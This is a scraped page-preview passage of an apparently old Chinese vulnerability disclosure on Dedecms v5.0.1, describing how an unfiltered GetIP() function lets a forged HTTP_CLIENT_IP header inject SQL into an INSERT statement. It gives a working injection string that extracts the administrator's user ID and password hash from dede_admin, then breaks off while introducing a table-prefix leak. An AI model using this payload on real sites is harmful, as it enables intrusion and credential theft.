- 1、本文档共5页,可阅读全部内容。
- 2、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。
- 3、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 4、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
查看更多
Dedecms v5.0.1多个0day漏洞暴光
Flyh4t
漏洞一:又见getiP()
比较经典的一段漏洞代码出现\include\inc_functions.php中数次将这个函数的结果直接入库,造成了很多处注射漏洞。当然,这个漏洞在dedecms4中也一直存在 :)
--------------------------------------------------------------------------------------------------------------------
//\include\inc_functions.php
function GetIP(){//该函数中的$_SERVER变量没有过滤,而且php5环境下不受gpc 影响
if(!empty($_SERVER[HTTP_CLIENT_IP])) $cip = $_SERVER[HTTP_CLIENT_IP];
else if(!empty($_SERVER[HTTP_X_FORWARDED_FOR]))
$cip = $_SERVER[HTTP_X_FORWARDED_FOR];
else if(!empty($_SERVER[REMOTE_ADDR])) $cip = $_SERVER[REMOTE_ADDR];
else $cip = 无法获取!;
return $cip;
}
----------------------------------------------------------------------------------------------------------------------
这个类型的漏洞已经很多了,我不再详细写了,只拿其中一处写了个poc方面理解:)
-------------------------------------------------------------------------------------------------
// \member\story_add_action.php (30)
$userip = getip();
$inQuery =
INSERT
INTO `#@__story_books`(`catid`,`bcatid`,`booktype`,`iscommend`,`click`,`freenum`,`bookname`,
`author`,`memberid`,`litpic`,`pubdate`,`ischeck`,`status`,
`lastpost`,`postnum`,`lastfeedback`,`fedbacknum`,`weekcc`,`monthcc`,`weekup`,`monthup`,
`description`,`body`,`keywords`,`userip`,`senddate` )
VALUES ($catid,$bcatid,$booktype, $iscommend, 0, $freenum, $bookname,
$author, {$cfg_ml-M_ID}, $litpic, $pubdate, $ischeck, 0,
0, 0, 0, 0, 0, 0, 0, 0,
$description , $body , $keywords, $userip,.mytime().);
;10
----------------------------------------------------------------------------------------------
只要伪造HTTP_CLIENT_IP 为11,1173448061),(1, 0, 0, 0, 1, 6,(SELECT concat( userid, 0x5f, pwd, 0x5f, uname ) FROM dede_admin WHERE id =1), flyh4t, 3, 0, 1173448047, 1, 0, 0, 1, 0, 0, 0, 0, 0, 0, flyh4t, flyh4t, flyh4t, 即可以注射这个漏洞了(不过这里要求mysql4=4.1,这个版本以上的支持子查询),具体的参考群共享里面的poc.。(dedecms_0day_poc.php)
漏洞二:暴数据库表前缀
这个漏洞和漏洞一是天生的一对,在用户修改了了表前缀的情况下我们的sql注射很难利用起来,但是这个漏洞给了我们一个机会 :) 看代码:
---------------------------------------------------------------------------------
您可能关注的文档
- AVR单片机软硬件设计教程(入门篇)全面培训.ppt
- AWardBIOS标准之CMOS设置学习.doc
- B2B发帖技巧-精华.doc
- B2453003-16AC HW-BA5201通用PID控制模块程序安装调试手册Ver101.doc
- Birth order and personality教案及反思何晓丹.doc
- c 第4章 面向对象编程进阶.ppt
- C++实验报告——实验2构造函数和析构函数.doc
- C1倒杆移库技巧图解教你一次过桩考.doc
- C5国行自带剑桥发声词典.doc
- c10接口与抽象类.ppt
- 10《那一年,面包飘香》教案.docx
- 13 花钟 教学设计-2023-2024学年三年级下册语文统编版.docx
- 2024-2025学年中职学校心理健康教育与霸凌预防的设计.docx
- 2024-2025学年中职生反思与行动的反霸凌教学设计.docx
- 2023-2024学年人教版小学数学一年级上册5.docx
- 4.1.1 线段、射线、直线 教学设计 2024-2025学年北师大版七年级数学上册.docx
- 川教版(2024)三年级上册 2.2在线导航选路线 教案.docx
- Unit 8 Dolls (教学设计)-2024-2025学年译林版(三起)英语四年级上册.docx
- 高一上学期体育与健康人教版 “贪吃蛇”耐久跑 教案.docx
- 第1课时 亿以内数的认识(教学设计)-2024-2025学年四年级上册数学人教版.docx
文档评论(0)